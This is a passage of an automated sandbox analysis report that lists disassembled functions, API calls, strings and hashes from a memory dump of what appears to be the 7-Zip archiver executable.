                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                                                                                                                        • Instruction ID: 1619bf40bbd16bf1040ed117130869ceb970e780379170d6d5e2e96a4219d8af
                                                                                                                                        • Opcode Fuzzy Hash: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                                                                                                                        • Instruction Fuzzy Hash: 47D13D76229AC5C1CB38DF26D4606AEB764F7C6B84F419142EB9E53716CF38C899CB04
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$free$memset$strlen$memmove
                                                                                                                                        • String ID: data:
                                                                                                                                        • API String ID: 527563900-3222861102
                                                                                                                                        • Opcode ID: 7f35ab0e6331bc4047d8b77d44634953cdcad3e9273a8884933ef37d4d4427da
                                                                                                                                        • Instruction ID: 50df5656945ceb08ec1f6f4e364b1d34cbe3439de55e0aa2723c0d4ef2b810a4
                                                                                                                                        • Opcode Fuzzy Hash: 7f35ab0e6331bc4047d8b77d44634953cdcad3e9273a8884933ef37d4d4427da
                                                                                                                                        • Instruction Fuzzy Hash: 3502387A32AA82C7DB14EF25E4903AE7760F395F88F445011EE4947699DF78CA69CB00
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 0027FAAC
                                                                                                                                        • free.MSVCRT ref: 0027FAC0
                                                                                                                                        • free.MSVCRT ref: 0027FC43
                                                                                                                                          • Part of subcall function 00242130: malloc.MSVCRT ref: 00242134
                                                                                                                                          • Part of subcall function 00242130: _CxxThrowException.MSVCRT ref: 0024214F
                                                                                                                                          • Part of subcall function 0027F820: _CxxThrowException.MSVCRT ref: 0027F88D
                                                                                                                                        • free.MSVCRT ref: 00280031
                                                                                                                                          • Part of subcall function 0027F8B8: memmove.MSVCRT ref: 0027F91E
                                                                                                                                          • Part of subcall function 0027F8B8: free.MSVCRT ref: 0027F926
                                                                                                                                          • Part of subcall function 0027F93C: memmove.MSVCRT ref: 0027F992
                                                                                                                                          • Part of subcall function 0027F93C: free.MSVCRT ref: 0027F99A
                                                                                                                                        • free.MSVCRT ref: 002800EA
                                                                                                                                        • free.MSVCRT ref: 002800F2
                                                                                                                                        • free.MSVCRT ref: 00280101
                                                                                                                                        • free.MSVCRT ref: 0028010A
                                                                                                                                        • free.MSVCRT ref: 00280113
                                                                                                                                        • free.MSVCRT ref: 00280121
                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00280184
                                                                                                                                        Strings
                                                                                                                                        • Duplicate filename in archive:, xrefs: 00280149
                                                                                                                                        • Duplicate filename on disk:, xrefs: 0027FCB4
                                                                                                                                        • Internal file name collision (file on disk, file in archive):, xrefs: 0028015D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ExceptionThrow$memmove$mallocmemset
                                                                                                                                        • String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
                                                                                                                                        • API String ID: 3338823681-819937569
                                                                                                                                        • Opcode ID: 9521c7463c57bd468579bd9d0cca01d96f5a15efec371beb17c4b08c5037fd74
                                                                                                                                        • Instruction ID: 6b43f0524de4370030c399b5deae6a320d09b97b9f9cdb444126194f29d2a158
                                                                                                                                        • Opcode Fuzzy Hash: 9521c7463c57bd468579bd9d0cca01d96f5a15efec371beb17c4b08c5037fd74
                                                                                                                                        • Instruction Fuzzy Hash: 7012A27323868486C760DF26E58065EB7A1F389B94F509625EF9E47B58CF78C8A5CF00
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5a7a2229169c206e7d32d379c78e0a3a989e06c9d583e6d283c26ea378f0f0af
                                                                                                                                        • Instruction ID: 70be3e567167224d6aa4c27b008a9a329e3624015fcbea204d1613460ccb552e
                                                                                                                                        • Opcode Fuzzy Hash: 5a7a2229169c206e7d32d379c78e0a3a989e06c9d583e6d283c26ea378f0f0af
                                                                                                                                        • Instruction Fuzzy Hash: C6029B32229B8182DB25DF25E4903AEB365FBC5B85F504122DF8E57B69DF78C858CB04
                                                                                                                                        APIs
                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 00248F7A
                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 0024905E
                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 002490B5
                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 002490F6
                                                                                                                                          • Part of subcall function 0024ABB0: GetModuleHandleW.KERNEL32 ref: 0024ABD1
                                                                                                                                          • Part of subcall function 0024ABB0: GetProcAddress.KERNEL32 ref: 0024ABE1
                                                                                                                                          • Part of subcall function 0024ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0024AC32
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
                                                                                                                                        • String ID: ($:
                                                                                                                                        • API String ID: 4250411929-4277925470
                                                                                                                                        • Opcode ID: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                                                                                                                        • Instruction ID: 25afc194cfd3d87e4025898bfd127a5716abd95ee7085e3b37d125332daec10d
                                                                                                                                        • Opcode Fuzzy Hash: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                                                                                                                        • Instruction Fuzzy Hash: A651DC33628BC296CB25DF20F05539EB765F3847A4F549526DB8E07B18EB79C4A8CB40
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$DriveLogicalStrings
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 837055893-0
                                                                                                                                        • Opcode ID: 8318703bd9191c6da4a53a4113810ec68973abb7b6aa763eb3a2aea7dddf63c9
                                                                                                                                        • Instruction ID: 7dacb973b901fb9c04e4365d3282d232671252e145c7f11449fbab830b14b0de
                                                                                                                                        • Opcode Fuzzy Hash: 8318703bd9191c6da4a53a4113810ec68973abb7b6aa763eb3a2aea7dddf63c9
                                                                                                                                        • Instruction Fuzzy Hash: 9931D723331A4585DF38EE22A85436E6355AB85BE4F884230AE5D57385DF38C866C700
                                                                                                                                        APIs
                                                                                                                                        • free.MSVCRT ref: 002496D1
                                                                                                                                        • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 00249723
                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 0024976C
                                                                                                                                        • free.MSVCRT ref: 00249779
                                                                                                                                        • free.MSVCRT ref: 00249796
                                                                                                                                        • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 002497C4
                                                                                                                                        • free.MSVCRT ref: 002497CD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ControlDeviceFileHandleInformationmemmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2572579059-0
                                                                                                                                        • Opcode ID: 744fc5bc47ccc28d687e4889d7ebfaf33458330fa61c370f485817518c51f99a
                                                                                                                                        • Instruction ID: 74be881620a62a7d41b67e38b0bb2dadf997ff0db76b466fa220f2dad836a2dd
                                                                                                                                        • Opcode Fuzzy Hash: 744fc5bc47ccc28d687e4889d7ebfaf33458330fa61c370f485817518c51f99a
                                                                                                                                        • Instruction Fuzzy Hash: F431B472225A41C5C7349F12F94066BF364E786BE0F588221EBED47B95DE39C4E58B00
                                                                                                                                        APIs
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32 ref: 0024B12A
                                                                                                                                        • FileTimeToSystemTime.KERNEL32 ref: 0024B13E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$File$LocalSystem
                                                                                                                                        • String ID: gfff
                                                                                                                                        • API String ID: 1748579591-1553575800
                                                                                                                                        • Opcode ID: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                        • Instruction ID: c5f387ca03dcbe9aff76b3e00e5f35480e0f34b95dd03c7f224cae8fae2155fd
                                                                                                                                        • Opcode Fuzzy Hash: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                        • Instruction Fuzzy Hash: 26519893B142C04BE7198F3DD846BCDBFC1E3A5B58F08822ADB9587785E66DC50AC721
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0024B5B8: GetCurrentProcess.KERNEL32 ref: 0024B5C2
                                                                                                                                        • GetSystemInfo.KERNEL32 ref: 0024B624
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentInfoProcessSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1098911721-0
                                                                                                                                        • Opcode ID: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                                                                                        • Instruction ID: 20b0bbd20e6584e5b1a6e788146b2991500a146d2f23121a77874dd098b51b97
                                                                                                                                        • Opcode Fuzzy Hash: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                                                                                        • Instruction Fuzzy Hash: 8FE0D866A3449483CF7ADF08D542729B364F394B45FC15611E68982E04DF3DC724CF00
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ee90a0e28cdf5ca319eb7aa323224805b652061d1b8a18153c9d68adb395663c
                                                                                                                                        • Instruction ID: 34afeae6880bda907862fecc5a575742f80bca13212b8b6d580c827bd778b7ad
                                                                                                                                        • Opcode Fuzzy Hash: ee90a0e28cdf5ca319eb7aa323224805b652061d1b8a18153c9d68adb395663c
                                                                                                                                        • Instruction Fuzzy Hash: 09C001FA2197408B874A8F2EA850818BBA0F788B907868029AA0CD3300E2358444CF24
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                                                                                                                        • Instruction ID: bb0ed357a0839910a98b5847edaac30be75a47e218bf8d6bc6657a87fba5ecf6
                                                                                                                                        • Opcode Fuzzy Hash: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                                                                                                                        • Instruction Fuzzy Hash: 95D1C8222755C0C1CB54FF26E45165FA764FBC2784F505152BB8E93B2ADE68C4EACF04
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                                                                                                                        • Instruction ID: 033e1c37f0f34a0605125bbe3fd3b8cb11b8c311f830223362dd8a8a7058efcf
                                                                                                                                        • Opcode Fuzzy Hash: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                                                                                                                        • Instruction Fuzzy Hash: 70912F32225AC4C6CB28EF36D064A6E67A4FBC7F85F466451EB4E53712CE38C499CB04
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$AddressCurrentProc$fputs$HandleLibraryLoadModuleTimesmemset
                                                                                                                                        • String ID: MCycles$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
                                                                                                                                        • API String ID: 600854398-319139910
                                                                                                                                        • Opcode ID: d7f8a16aaa2cb06036e5352a6df670f190340cc497d1c3e3751f8c418c22ba6f
                                                                                                                                        • Instruction ID: cdda46b0fac6b1da69c838711320e6aa6145ca64331cdbc5f5ad3ff427337a1b
                                                                                                                                        • Opcode Fuzzy Hash: d7f8a16aaa2cb06036e5352a6df670f190340cc497d1c3e3751f8c418c22ba6f
                                                                                                                                        • Instruction Fuzzy Hash: B1519069312A8286EF60EF65F84C7A96361F789BC0F448026DE4D437A9EF3CC559C700
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3352498445-0
                                                                                                                                        • Opcode ID: 8819eb4ac5f063c5bbb5f4303b5b01a0bd0b51a58e3db2039743ee0f597dbeda
                                                                                                                                        • Instruction ID: 6a10b70933c854a55724ba3324df2a29f3c1ce9950783d096282183a72de7f94
                                                                                                                                        • Opcode Fuzzy Hash: 8819eb4ac5f063c5bbb5f4303b5b01a0bd0b51a58e3db2039743ee0f597dbeda
                                                                                                                                        • Instruction Fuzzy Hash: 86E1C433628AD1C6CB20FE16E48119DA764F786BD0F490126FF9D57B15CE68C8EACB40
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove$ExceptionThrow
                                                                                                                                        • String ID: incorrect update switch command$pqrxyzw
                                                                                                                                        • API String ID: 3957182552-3922825594
                                                                                                                                        • Opcode ID: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                                                                                        • Instruction ID: 78b871e14b1219204bbfab9ea3f63da14e40aaf29debe2c740bd4bf7f64370b1
                                                                                                                                        • Opcode Fuzzy Hash: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                                                                                        • Instruction Fuzzy Hash: B08193222355C4C2CB20EF16D8817AE7364FBC5B84F804112EF9E47765DE38C9AACB44
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove$wcscmp$ExceptionThrow
                                                                                                                                        • String ID: Empty file path
                                                                                                                                        • API String ID: 462375450-1562447899
                                                                                                                                        • Opcode ID: 6df32785e77c8c620da92295a3c2740db2b86afb1697241f6b43dd461b33d2b9
                                                                                                                                        • Instruction ID: 6012720fb089593a2d6e7223e697b017cb66b91ad9baffd05f5adf267f1561bd
                                                                                                                                        • Opcode Fuzzy Hash: 6df32785e77c8c620da92295a3c2740db2b86afb1697241f6b43dd461b33d2b9
                                                                                                                                        • Instruction Fuzzy Hash: B5D1E332234AD186CB28EF25D48039EB760FB85B94F544125EF9E47B5ADF78C969CB00
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: \$\\?\$\\?\UNC\
                                                                                                                                        • API String ID: 0-1962706685
                                                                                                                                        • Opcode ID: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                        • Instruction ID: 32214743d26a09488c490df6e54705e3ce75e311cfe63f7f602b0d17f772cc28
                                                                                                                                        • Opcode Fuzzy Hash: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                        • Instruction Fuzzy Hash: C1B1D22227894090CF18FF21D45116EA764EB927C4F855112FE4E4777ADFA8C9AACF02
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00241C98
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00241CB9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                        • Opcode ID: 5dcf686a09ca25460ee6151b015904e6cf6bf16efac6897398dd48f79e9a8534
                                                                                                                                        • Instruction ID: 133439deefc5b56ed63896b99c5073501c15467b514a8a6ec2b2ac7e63d6dfd6
